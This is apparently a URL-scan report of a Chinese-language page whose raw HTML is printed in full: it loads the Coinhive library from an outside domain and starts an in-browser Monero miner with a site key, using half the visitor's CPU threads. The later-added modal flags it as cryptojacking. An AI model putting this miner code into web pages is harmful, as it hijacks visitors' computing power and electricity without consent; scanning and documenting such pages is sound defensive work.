- 扫描 ID:
- 78c44b92-4a5a-4f8a-9ed7-1b17cd73a22f已完成
- 提交的 URL:
- https://win7777.net/xauto.htm
- 报告完成时间:
链接 · 找到 1 个
从页面中识别出的传出链接
链接 | 文本 |
---|---|
https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies | Click here for more information |
JavaScript 变量 · 找到 5 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
cpuConfig | object |
miner | undefined |
控制台日志消息 · 找到 1 条
记录到 Web 控制台的消息
类型 | 类别 | 记录 |
---|---|---|
error | network |
|
HTML
页面的原始 HTML 正文
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<title>auto</title>
<style>.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; } .js-modal-inner a { color: #000; text-decoration: underline; }</style></head>
<body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<p style="font-size: 9pt;">
</p><p style="font-size: 11pt;" id="status"></p>
<p style="font-size: 11pt;" id="hashesPerSecond"></p>
<p style="font-size: 11pt;" id="getTotalHashes"></p>
<p style="font-size: 11pt;" id="stopped"></p>
<p id="minerbutton"></p>
<script>
if (navigator.hardwareConcurrency > 1){
var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/2)}
}else{
var cpuConfig = {throttle:0.3}
}
var miner = new CoinHive.Anonymous('gLjAsgvJJBUk5saTpdxnSiZsAmBGTJcZ', cpuConfig);
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
var threadCount = miner.getNumThreads();
var hashesPerSecond = Math.round(miner.getHashesPerSecond());
var getTotalHashes = miner.getTotalHashes();
try {
navigator.getBattery().then(function (battery) {
if (battery.level < 0.50 && battery.charging == false) {
miner.stop();
document.getElementById("stopped").innerHTML = "偵測到電量不足已停止運算";
}
});
}catch(e){console.log(e)}
// Output to HTML elements...
if (miner.isRunning()) {
document.getElementById("status").innerHTML = "狀態: 正在使用 " + threadCount + " 個執行緒";
document.getElementById("hashesPerSecond").innerHTML = "轉換率: " + hashesPerSecond + " H/s";
document.getElementById("getTotalHashes").innerHTML = "已轉換: " + getTotalHashes + " 次Hash";
document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.stop()\">STOP</button>";
}else{
document.getElementById("status").innerHTML = "狀態: 沒有在進行運算";
document.getElementById("hashesPerSecond").innerHTML = "您的算力: " + 0 + " H/s";
document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">開始</button>";
}
}, 800);
</script>
<div class="js-modal"><div class="js-modal-inner">This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.</div></div></body></html>